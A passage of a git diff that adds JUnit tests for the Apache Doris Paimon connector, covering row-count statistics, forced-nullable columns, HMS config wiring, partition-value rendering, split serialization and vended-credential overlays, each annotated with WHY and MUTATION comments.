7th ctor arg added for this feature. + // MUTATION: dropping the partition.fileCount() feed (-> UNKNOWN=-1), or passing any other stat + // (recordCount/fileSizeInBytes/lastFileCreationTime) into the fileCount slot -> red. + Assertions.assertEquals(7L, info.getFileCount()); + Assertions.assertEquals(42L, info.getRowCount()); + Assertions.assertEquals(1024L, info.getSizeBytes()); + Assertions.assertEquals(1700000000000L, info.getLastModifiedMillis()); + } + @Test public void legacyNameFalseDoesNotRenderDateKey() { RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataStatisticsTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataStatisticsTest.java new file mode 100644 index 00000000000000..b92535ee7051a5 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataStatisticsTest.java @@ -0,0 +1,139 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.api.ConnectorTableStatistics; + +import org.apache.paimon.types.DataTypes; +import org.apache.paimon.types.RowType; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; +import java.util.Optional; + +/** + * Unit tests for FIX-TABLE-STATS: {@link PaimonConnectorMetadata#getTableStatistics}. + * + *

      Before the fix the connector inherited the default {@code ConnectorStatisticsOps} (returns + * {@code Optional.empty()}), so every paimon table — normal AND system — reported row count -1 + * (UNKNOWN), degrading the Nereids cost model (join-reorder force-disabled) and SHOW/info_schema. + * The fix overrides it to sum {@code split.rowCount()} via the {@code PaimonCatalogOps.rowCount} + * seam (faked here — {@code FakePaimonTable.newReadBuilder()} throws, the whole reason for the + * seam). Each test FAILS before the fix (default empty) and PASSES after, and encodes WHY. + */ +public class PaimonConnectorMetadataStatisticsTest { + + private static PaimonConnectorMetadata metadataWith(RecordingPaimonCatalogOps ops) { + return new PaimonConnectorMetadata(ops, Collections.emptyMap(), new RecordingConnectorContext()); + } + + private static RowType rowType(String... columnNames) { + RowType.Builder builder = RowType.builder(); + for (String name : columnNames) { + builder.field(name, DataTypes.INT()); + } + return builder.build(); + } + + @Test + public void positiveRowCountReturnedAsStatistics() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.rowCount = 42; + FakePaimonTable fake = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + ops.table = fake; + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + handle.setPaimonTable(fake); + + Optional stats = metadataWith(ops).getTableStatistics(null, handle); + + // WHY: a real positive count must reach the FE cost model (not -1), else + // StatsCalculator force-disables join-reorder for the whole query. dataSize stays UNKNOWN(-1) + // (legacy computed no base-table dataSize here). Asserting lastRowCountTable == fake proves + // the metadata layer planned the RESOLVED table the handle denotes, not some other handle. + // MUTATION: inheriting the default empty -> not present -> red. + Assertions.assertTrue(stats.isPresent(), "a positive row count must be reported, not UNKNOWN"); + Assertions.assertEquals(42L, stats.get().getRowCount()); + Assertions.assertEquals(-1L, stats.get().getDataSize()); + Assertions.assertTrue(ops.log.contains("rowCount"), "the row-count seam must be invoked"); + Assertions.assertSame(fake, ops.lastRowCountTable, + "stats must be computed from the table the handle resolves to"); + } + + @Test + public void zeroRowCountMapsToUnknownEmpty() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.rowCount = 0; + FakePaimonTable fake = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + ops.table = fake; + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + handle.setPaimonTable(fake); + + // WHY: legacy mapped 0 -> UNKNOWN(-1) (rowCount > 0 ? rowCount : UNKNOWN); the FE treats a + // present 0 as a real cardinality, which would corrupt cost estimates. So 0 MUST surface as + // empty, not (0,-1). MUTATION: dropping the >0 gate (returning (0,-1)) -> present -> red. + Assertions.assertFalse(metadataWith(ops).getTableStatistics(null, handle).isPresent(), + "0 rows must map to UNKNOWN (empty), matching legacy"); + } + + @Test + public void planningFailureReturnsEmptyNotThrow() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.throwOnRowCount = true; + FakePaimonTable fake = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + ops.table = fake; + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + handle.setPaimonTable(fake); + + // WHY: stats collection is best-effort (runs in background analysis / SHOW paths); a transient + // remote planning failure must NOT propagate as a query-killing exception — it must degrade to + // UNKNOWN(-1). This is the deliberate divergence from legacy's propagate-up behavior. + // MUTATION: letting the exception propagate -> the assertDoesNotThrow fails -> red. + Optional stats = Assertions.assertDoesNotThrow( + () -> metadataWith(ops).getTableStatistics(null, handle)); + Assertions.assertFalse(stats.isPresent(), "a planning failure must degrade to UNKNOWN, not throw"); + } + + @Test + public void systemTableUsesResolvedSysTable() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.rowCount = 7; + FakePaimonTable sysFake = new FakePaimonTable( + "t1$snapshots", rowType("snapshot_id"), Collections.emptyList(), Collections.emptyList()); + ops.sysTable = sysFake; + PaimonTableHandle sysHandle = PaimonTableHandle.forSystemTable("db1", "t1", "snapshots", false); + sysHandle.setPaimonTable(sysFake); + + Optional stats = metadataWith(ops).getTableStatistics(null, sysHandle); + + // WHY: PluginDrivenSysExternalTable inherits the same fetchRowCount, and resolveTable is + // sys-aware, so the single override must serve system tables too (closes Finding 5.1). A + // future refactor that special-cased only normal tables would leave sys tables at -1. + // MUTATION: not handling sys handles / planning the wrong table -> rowCount!=7 or wrong table -> red. + Assertions.assertTrue(stats.isPresent()); + Assertions.assertEquals(7L, stats.get().getRowCount()); + Assertions.assertSame(sysFake, ops.lastRowCountTable, + "a sys handle must plan its OWN synthetic table's splits"); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java index 904942fdd7724f..0573d2ec5bce88 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java @@ -17,9 +17,13 @@ package org.apache.doris.connector.paimon; +import org.apache.doris.connector.api.ConnectorColumn; +import org.apache.doris.connector.api.ConnectorTableSchema; import org.apache.doris.connector.api.handle.ConnectorColumnHandle; import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.mvcc.ConnectorMvccSnapshot; +import org.apache.paimon.types.DataField; import org.apache.paimon.types.DataTypes; import org.apache.paimon.types.RowType; import org.junit.jupiter.api.Assertions; @@ -226,4 +230,61 @@ public void disablesCastPredicatePushdown() { + "and pushing the stripped predicate under-matches at the source, " + "silently dropping rows BE re-eval cannot recover"); } + + // --------------------------------------------------------------------- + // FIX-READ-NOTNULL — read-path columns forced nullable (legacy parity) + // --------------------------------------------------------------------- + + @Test + public void getTableSchemaForcesColumnsNullableForLegacyParity() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + // A paimon NOT NULL field (PK-like) mixed with a nullable field; DataTypes.INT() is nullable + // by default, .notNull() flips it. Paimon forces PK columns NOT NULL, so this is the common case. + RowType rt = RowType.builder() + .field("id", DataTypes.INT().notNull()) + .field("val", DataTypes.INT()) + .build(); + FakePaimonTable table = new FakePaimonTable( + "t1", rt, Collections.emptyList(), Collections.singletonList("id")); + ops.table = table; + + ConnectorTableHandle handle = metadataWith(ops).getTableHandle(null, "db1", "t1").get(); + ConnectorTableSchema schema = metadataWith(ops).getTableSchema(null, handle); + + // WHY: legacy PaimonExternalTable always declared paimon columns nullable (isAllowNull=true) + // regardless of the field's NOT NULL flag, so nereids cannot fold null-rejecting predicates + // on a NOT NULL external column that can still read NULL (schema-evolution default-fill). A + // paimon PK NOT NULL field MUST still surface as nullable to Doris. MUTATION: reverting + // mapFields to field.type().isNullable() -> the 'id' column becomes isNullable()==false -> red. + ConnectorColumn id = schema.getColumns().get(0); + ConnectorColumn val = schema.getColumns().get(1); + Assertions.assertEquals("id", id.getName()); + Assertions.assertTrue(id.isNullable(), + "a paimon NOT NULL (PK) column must surface as nullable to Doris (legacy parity)"); + Assertions.assertTrue(val.isNullable()); + } + + @Test + public void getTableSchemaAtSnapshotAlsoForcesNullable() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + FakePaimonTable table = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.singletonList("id")); + ops.table = table; + // The historical (at-snapshot) schema's 'id' field is NOT NULL. + ops.schemaAt = new PaimonCatalogOps.PaimonSchemaSnapshot( + Collections.singletonList(new DataField(0, "id", DataTypes.INT().notNull())), + Collections.emptyList(), + Collections.singletonList("id")); + + ConnectorTableHandle handle = metadataWith(ops).getTableHandle(null, "db1", "t1").get(); + ConnectorMvccSnapshot snapshot = ConnectorMvccSnapshot.builder().schemaId(5).build(); + ConnectorTableSchema schema = metadataWith(ops).getTableSchema(null, handle, snapshot); + + // WHY: the latest and at-snapshot read paths share mapFields; this pins that the time-travel + // path also obeys legacy nullable parity and cannot drift from the latest path. MUTATION: + // reverting mapFields to field.type().isNullable() -> the at-snapshot 'id' becomes + // non-nullable -> red. + Assertions.assertTrue(schema.getColumns().get(0).isNullable(), + "the at-snapshot read path must also force columns nullable (legacy parity)"); + } } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonHmsConfResWiringTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonHmsConfResWiringTest.java new file mode 100644 index 00000000000000..d087e13530d76a --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonHmsConfResWiringTest.java @@ -0,0 +1,65 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; +import java.util.HashMap; +import java.util.Map; + +/** + * FIX-HMS-CONFRES connector-wiring test: proves the HMS create path actually CALLS + * {@code ConnectorContext.loadHiveConfResources} and feeds the result into the HiveConf builder + * (intent: no silent drop of an external hive-site.xml), not merely that the pure builder works. + * + *

      The HMS catalog cannot be fully created offline (no live metastore). We drive the connector's + * lazy catalog creation with {@code RecordingConnectorContext.failAuth=true}, so creation fails fast + * at {@code executeAuthenticated} — AFTER the HMS branch has already resolved the file via the hook, + * and BEFORE any metastore connection is attempted. + */ +public class PaimonHmsConfResWiringTest { + + @Test + public void hmsBranchRoutesHiveConfResourcesThroughContext() { + RecordingConnectorContext ctx = new RecordingConnectorContext(); + ctx.failAuth = true; + ctx.hiveConfResources = Collections.singletonMap("hive.metastore.sasl.qop", "auth-conf"); + + Map props = new HashMap<>(); + props.put("paimon.catalog.type", "hms"); + props.put("warehouse", "/wh"); + props.put("hive.metastore.uris", "thrift://nn:9083"); + props.put("hive.conf.resources", "hive-site.xml"); + + PaimonConnector connector = new PaimonConnector(props, ctx); + + // getMetadata -> ensureCatalog -> createCatalog: the HMS branch calls loadHiveConfResources + // first, then createCatalogFromContext fails fast (failAuth) before connecting to a metastore. + Assertions.assertThrows(RuntimeException.class, () -> connector.getMetadata(null)); + + // WHY: a future refactor that builds the HiveConf without consulting the hook would silently + // drop the external hive-site.xml again (the very defect). MUTATION: HMS branch not calling + // loadHiveConfResources -> hiveConfResourcesCalled false / wrong arg -> red. + Assertions.assertTrue(ctx.hiveConfResourcesCalled, + "the HMS branch must call ConnectorContext.loadHiveConfResources (no silent drop)"); + Assertions.assertEquals("hive-site.xml", ctx.lastHiveConfResourcesArg, + "the connector must pass the raw hive.conf.resources value to the hook"); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonPartitionValueRenderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonPartitionValueRenderTest.java new file mode 100644 index 00000000000000..d6357f58de8b41 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonPartitionValueRenderTest.java @@ -0,0 +1,127 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.paimon.data.Timestamp; +import org.apache.paimon.types.DataTypes; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.time.LocalDate; +import java.time.LocalDateTime; + +/** + * Unit tests for {@link PaimonScanPlanProvider#serializePartitionValue}, the FIX-NATIVE-PARTVAL + * per-type partition-value renderer (byte-faithful port of legacy + * {@code PaimonUtil.serializePartitionValue}). + * + *

      For native ORC/Parquet reads BE materializes partition columns from this string (columnsFromPath); + * a wrong string ⇒ wrong materialized rows. The pure static is the established testable seam (the + * map wrapper {@code getPartitionInfoMap} needs a real {@code BinaryRow}+converter, heavy offline — + * the same reason {@code shouldUseNativeReader} is tested as a pure static). Each test FAILS before + * the fix (raw {@code Object.toString()}) and PASSES after, and encodes WHY (the BE contract), not + * just WHAT. Offline, no fe-core, no Mockito — pure paimon {@code DataTypes}/{@code Timestamp}. + */ +public class PaimonPartitionValueRenderTest { + + @Test + public void dateRendersAsIsoDateNotEpochDays() { + int epochDays = (int) LocalDate.of(2024, 1, 1).toEpochDay(); + String rendered = PaimonScanPlanProvider.serializePartitionValue( + DataTypes.DATE(), Integer.valueOf(epochDays), "UTC"); + + // WHY: RowDataToObjectArrayConverter yields a boxed Integer epoch-days for DATE; a raw + // toString() emits "19723" which BE parses as a garbage date -> data corruption. The ISO + // render is the contract BE's columnsFromPath expects. MUTATION: raw toString() -> "19723" -> red. + Assertions.assertEquals("2024-01-01", rendered); + } + + @Test + public void ltzShiftsUtcToSessionZone() { + // Paimon stores LTZ as the UTC instant; build the UTC wall clock 2024-01-01T01:02:03. + Timestamp utcWallClock = Timestamp.fromLocalDateTime(LocalDateTime.of(2024, 1, 1, 1, 2, 3)); + + // Asia/Shanghai is UTC+8 -> 09:02:03. Non-zero seconds are used deliberately so the + // ISO_LOCAL_DATE_TIME formatter renders the seconds component unambiguously (it omits + // seconds when both second and nano are zero). + String shanghai = PaimonScanPlanProvider.serializePartitionValue( + DataTypes.TIMESTAMP_WITH_LOCAL_TIME_ZONE(), utcWallClock, "Asia/Shanghai"); + String utc = PaimonScanPlanProvider.serializePartitionValue( + DataTypes.TIMESTAMP_WITH_LOCAL_TIME_ZONE(), utcWallClock, "UTC"); + + // WHY: LTZ partition values are stored in UTC and must be shown in the SESSION zone (legacy + // PaimonUtil.serializePartitionValue applies ZoneId.of(timeZone)); pre-fix raw toString() + // renders the un-shifted UTC wall clock under every session. Asserting both the shifted + // (Shanghai) AND unshifted (UTC) values pins that the zone param is actually applied. + // MUTATION: ignoring timeZone (raw toString) -> both equal -> red. + Assertions.assertEquals("2024-01-01T09:02:03", shanghai); + Assertions.assertEquals("2024-01-01T01:02:03", utc); + } + + @Test + public void ntzRendersIsoNoZoneShift() { + Timestamp ts = Timestamp.fromLocalDateTime(LocalDateTime.of(2024, 1, 1, 1, 2, 3)); + String rendered = PaimonScanPlanProvider.serializePartitionValue( + DataTypes.TIMESTAMP(), ts, "Asia/Shanghai"); + + // WHY: TIMESTAMP_WITHOUT_TIME_ZONE is a wall clock and must NOT be zone-shifted, regardless + // of the session zone (the memory-note caveat: NTZ stays wall-clock). Guards against a future + // "shift everything" regression. MUTATION: applying the session zone to NTZ -> "...T09:02:03" -> red. + Assertions.assertEquals("2024-01-01T01:02:03", rendered); + } + + @Test + public void binaryYieldsUnsupported() { + // WHY: binary must NOT be rendered as [B@hash (non-deterministic JVM identity); the legacy + // contract is to THROW so the caller drops the whole partition map (no columnsFromPath). + // MUTATION: any render path for binary (no throw) -> red. + Assertions.assertThrows(UnsupportedOperationException.class, + () -> PaimonScanPlanProvider.serializePartitionValue( + DataTypes.BYTES(), new byte[] {1, 2}, "UTC")); + } + + @Test + public void floatDoubleUseToStringRender() { + // WHY: parity with legacy Float.toString / Double.toString. MUTATION: a different numeric + // render -> red. + Assertions.assertEquals("1.5", + PaimonScanPlanProvider.serializePartitionValue(DataTypes.FLOAT(), 1.5f, "UTC")); + Assertions.assertEquals("2.25", + PaimonScanPlanProvider.serializePartitionValue(DataTypes.DOUBLE(), 2.25d, "UTC")); + } + + @Test + public void integerRendersViaToString() { + // WHY: scalar types (the common partition case) go through value.toString(); pins the + // base-case parity. MUTATION: mis-routing INTEGER to a typed branch -> red. + Assertions.assertEquals("42", + PaimonScanPlanProvider.serializePartitionValue(DataTypes.INT(), 42, "UTC")); + } + + @Test + public void nullValueRendersNull() { + // WHY: every case null-guards (returns null), preserved from legacy; PaimonScanRange / + // ConnectorPartitionValues.normalize handle null entries. MUTATION: NPE or "null" string -> red. + Assertions.assertNull( + PaimonScanPlanProvider.serializePartitionValue(DataTypes.INT(), null, "UTC")); + Assertions.assertNull( + PaimonScanPlanProvider.serializePartitionValue(DataTypes.DATE(), null, "UTC")); + Assertions.assertNull(PaimonScanPlanProvider.serializePartitionValue( + DataTypes.TIMESTAMP_WITH_LOCAL_TIME_ZONE(), null, "Asia/Shanghai")); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index dfa5dae39768e2..ff315b7852e3a9 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -17,15 +17,40 @@ package org.apache.doris.connector.paimon; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.spi.ConnectorContext; + +import org.apache.paimon.catalog.Catalog; +import org.apache.paimon.catalog.FileSystemCatalog; +import org.apache.paimon.catalog.Identifier; +import org.apache.paimon.data.GenericRow; +import org.apache.paimon.fs.local.LocalFileIO; +import org.apache.paimon.io.DataInputViewStreamWrapper; +import org.apache.paimon.schema.Schema; import org.apache.paimon.table.Table; +import org.apache.paimon.table.sink.BatchTableCommit; +import org.apache.paimon.table.sink.BatchTableWrite; +import org.apache.paimon.table.sink.BatchWriteBuilder; +import org.apache.paimon.table.sink.CommitMessage; +import org.apache.paimon.table.source.DataSplit; import org.apache.paimon.table.source.RawFile; +import org.apache.paimon.table.source.Split; import org.apache.paimon.types.DataTypes; import org.apache.paimon.types.RowType; +import org.apache.paimon.utils.InstantiationUtil; import org.junit.jupiter.api.Assertions; import org.junit.jupiter.api.Test; +import org.junit.jupiter.api.io.TempDir; +import java.io.ByteArrayInputStream; +import java.nio.charset.StandardCharsets; +import java.nio.file.Path; import java.util.Arrays; +import java.util.Base64; import java.util.Collections; +import java.util.HashMap; +import java.util.List; +import java.util.Map; import java.util.Optional; /** @@ -241,4 +266,274 @@ public void resolveTableUsesTransientWithoutReload() { Assertions.assertTrue(ops.log.isEmpty(), "with a present transient table, no remote getTable reload must happen"); } + + // --------------------------------------------------------------------- + // FIX-CPP-READER — split serialization format must match the BE reader + // --------------------------------------------------------------------- + + /** FE Java-serde leg, byte-identical to PaimonScanPlanProvider.encodeObjectToString (private). */ + private static String feJavaEncode(Object obj) throws Exception { + byte[] bytes = InstantiationUtil.serializeObject(obj); + return new String(Base64.getEncoder().encode(bytes), StandardCharsets.UTF_8); + } + + /** + * Builds a REAL paimon {@link DataSplit} offline: a local FileSystemCatalog over LocalFileIO + * under the @TempDir warehouse, a real keyed table, two committed rows, then plan().splits(). + * (Same local-catalog recipe proven by PaimonTableSerdeRoundTripTest; this adds the write step.) + */ + private static DataSplit buildRealDataSplit(Path warehouse) throws Exception { + try (Catalog catalog = new FileSystemCatalog(LocalFileIO.create(), + new org.apache.paimon.fs.Path(warehouse.toUri()))) { + catalog.createDatabase("db", false); + Identifier id = Identifier.create("db", "t"); + catalog.createTable(id, Schema.newBuilder() + .column("id", DataTypes.INT()) + .column("val", DataTypes.BIGINT()) + .primaryKey("id") + .option("bucket", "1") + .build(), false); + Table table = catalog.getTable(id); + + BatchWriteBuilder wb = table.newBatchWriteBuilder(); + try (BatchTableWrite write = wb.newWrite()) { + write.write(GenericRow.of(1, 100L)); + write.write(GenericRow.of(2, 200L)); + List messages = write.prepareCommit(); + try (BatchTableCommit commit = wb.newCommit()) { + commit.commit(messages); + } + } + + for (Split s : table.newReadBuilder().newScan().plan().splits()) { + if (s instanceof DataSplit) { + return (DataSplit) s; + } + } + throw new IllegalStateException("test fixture produced no DataSplit"); + } + } + + @Test + public void cppReaderFlagSelectsNativeBinaryForDataSplit(@TempDir Path warehouse) throws Exception { + DataSplit dataSplit = buildRealDataSplit(warehouse); + + String nativeWire = PaimonScanPlanProvider.encodeSplit(dataSplit, /*cppReader*/ true); + byte[] bytes = Base64.getDecoder().decode(nativeWire.getBytes(StandardCharsets.UTF_8)); + DataSplit roundTripped = DataSplit.deserialize( + new DataInputViewStreamWrapper(new ByteArrayInputStream(bytes))); + + // WHY: when enable_paimon_cpp_reader is on, BE's PaimonCppReader runs the NATIVE + // paimon::Split::Deserialize over the blob. So FE must emit DataSplit.serialize (native + // binary), NOT Java object serde — else BE dies with "paimon-cpp deserialize split failed". + // The native wire must (a) decode back to an equal DataSplit (the format BE consumes), and + // (b) DIFFER from the Java-serde wire (proves the format actually switched). + // MUTATION: dropping the cppReader branch -> both encodings equal / native deserialize fails -> red. + Assertions.assertEquals(dataSplit, roundTripped, + "native-format wire must round-trip via DataSplit.deserialize (what BE cpp reader decodes)"); + Assertions.assertNotEquals(feJavaEncode(dataSplit), nativeWire, + "flag-on must produce the native binary format, not Java object serialization"); + } + + @Test + public void cppReaderFlagOffKeepsJavaSerialization(@TempDir Path warehouse) throws Exception { + DataSplit dataSplit = buildRealDataSplit(warehouse); + + // WHY: default reads (flag off) must be byte-for-byte the existing Java object serialization + // for the Java JNI reader — no behavior change when the cpp reader is disabled. + // MUTATION: always-native -> the encoding differs from the Java leg -> red. + Assertions.assertEquals(feJavaEncode(dataSplit), + PaimonScanPlanProvider.encodeSplit(dataSplit, /*cppReader*/ false), + "flag-off must keep the Java object serialization byte-for-byte"); + } + + /** A non-DataSplit Split (the only abstract method is rowCount(); Split is Serializable). */ + private static final class NonDataSplitStub implements Split { + private static final long serialVersionUID = 1L; + + @Override + public long rowCount() { + return 0; + } + } + + @Test + public void nonDataSplitStaysJavaSerializedEvenWithCppFlag() throws Exception { + NonDataSplitStub stub = new NonDataSplitStub(); + + // WHY: the native binary format only exists for DataSplit. System splits (the nonDataSplits + // loop) and the no-raw-file JNI fallback have no native form, so they MUST stay Java-serialized + // even when the flag is on (legacy's `split instanceof DataSplit` gate). MUTATION: removing the + // instanceof guard -> ClassCastException / wrong format applied to a non-DataSplit -> red. + Assertions.assertEquals(feJavaEncode(stub), + PaimonScanPlanProvider.encodeSplit(stub, /*cppReader*/ true), + "a non-DataSplit must never take the native format, even with the cpp flag on"); + } + + private static ConnectorSession sessionWithProps(Map sessionProps) { + return new ConnectorSession() { + @Override + public String getQueryId() { + return "q"; + } + + @Override + public String getUser() { + return "u"; + } + + @Override + public String getTimeZone() { + return "UTC"; + } + + @Override + public String getLocale() { + return "en_US"; + } + + @Override + public long getCatalogId() { + return 0; + } + + @Override + public String getCatalogName() { + return "c"; + } + + @Override + public T getProperty(String name, Class type) { + return null; + } + + @Override + public Map getCatalogProperties() { + return Collections.emptyMap(); + } + + @Override + public Map getSessionProperties() { + return sessionProps; + } + }; + } + + @Test + public void isCppReaderEnabledReadsSessionProperty() { + // WHY: pins the EXACT session key ("enable_paimon_cpp_reader", byte-identical to + // SessionVariable.ENABLE_PAIMON_CPP_READER) and the default-false semantics. The format choice + // hinges on reading this flag correctly. MUTATION: wrong key, or defaulting true -> red. + Assertions.assertTrue(PaimonScanPlanProvider.isCppReaderEnabled( + sessionWithProps(Collections.singletonMap("enable_paimon_cpp_reader", "true")))); + Assertions.assertFalse(PaimonScanPlanProvider.isCppReaderEnabled( + sessionWithProps(Collections.singletonMap("enable_paimon_cpp_reader", "false")))); + Assertions.assertFalse(PaimonScanPlanProvider.isCppReaderEnabled( + sessionWithProps(Collections.emptyMap())), "absent flag must default to false"); + Assertions.assertFalse(PaimonScanPlanProvider.isCppReaderEnabled(null), + "a null session must default to false"); + } + + // --------------------------------------------------------------------- + // FIX-REST-VENDED — per-table vended credentials overlaid as location.* + // --------------------------------------------------------------------- + + @Test + public void extractVendedTokenEmptyForNullAndNonRestFileIO() { + // WHY: vended credentials must be attempted ONLY for REST tables (RESTTokenFileIO). A null + // table, a table with no FileIO, and a table with a non-REST FileIO must ALL yield nothing — + // never leak/attempt a token. MUTATION: vending for any FileIO type -> red. (The positive + // RESTTokenFileIO branch needs a live REST stack -> covered by the fe-core bridge test + E2E.) + Assertions.assertTrue(PaimonScanPlanProvider.extractVendedToken(null).isEmpty(), + "a null table yields no vended token"); + + FakePaimonTable nullFileIo = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + Assertions.assertTrue(PaimonScanPlanProvider.extractVendedToken(nullFileIo).isEmpty(), + "a table with no FileIO yields no vended token"); + + FakePaimonTable nonRest = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + nonRest.fileIO = LocalFileIO.create(); // a real, non-REST FileIO + Assertions.assertTrue(PaimonScanPlanProvider.extractVendedToken(nonRest).isEmpty(), + "a non-RESTTokenFileIO table must yield no vended token"); + } + + /** A ConnectorContext whose vendStorageCredentials returns a fixed normalized map (the engine's + * StorageProperties normalization is exercised by the fe-core DefaultConnectorContextVendTest). */ + private static ConnectorContext vendingContext(Map fixed) { + return new ConnectorContext() { + @Override + public String getCatalogName() { + return "c"; + } + + @Override + public long getCatalogId() { + return 0; + } + + @Override + public Map vendStorageCredentials(Map raw) { + return fixed; + } + }; + } + + @Test + public void getScanNodePropertiesOverlaysVendedCreds() { + FakePaimonTable table = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + handle.setPaimonTable(table); + + Map vended = new HashMap<>(); + vended.put("AWS_ACCESS_KEY", "vended-ak"); + vended.put("AWS_SECRET_KEY", "vended-sk"); + vended.put("AWS_TOKEN", "vended-tok"); + vended.put("s3.endpoint", "vended-ep"); // collides with the static s3.endpoint below + + Map props = new HashMap<>(); + props.put("s3.endpoint", "static-ep"); + PaimonScanPlanProvider provider = new PaimonScanPlanProvider( + props, new RecordingPaimonCatalogOps(), vendingContext(vended)); + + Map scanProps = provider.getScanNodeProperties( + null, handle, Collections.emptyList(), Optional.empty()); + + // WHY (BLOCKER): native-reader REST tables must receive normalized vended AWS_* creds under + // location.*; without them BE hits the object store with no credentials (403). Vended overlays + // static (legacy precedence). MUTATION: no overlay loop / context not threaded -> AWS_* absent + // -> red; overlaying BEFORE the static loop -> the colliding location.s3.endpoint keeps the + // static value -> red. + Assertions.assertEquals("vended-ak", scanProps.get("location.AWS_ACCESS_KEY")); + Assertions.assertEquals("vended-sk", scanProps.get("location.AWS_SECRET_KEY")); + Assertions.assertEquals("vended-tok", scanProps.get("location.AWS_TOKEN")); + Assertions.assertEquals("vended-ep", scanProps.get("location.s3.endpoint"), + "vended creds must overlay (win over) the static location key on collision"); + } + + @Test + public void getScanNodePropertiesNoContextUnchanged() { + FakePaimonTable table = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", 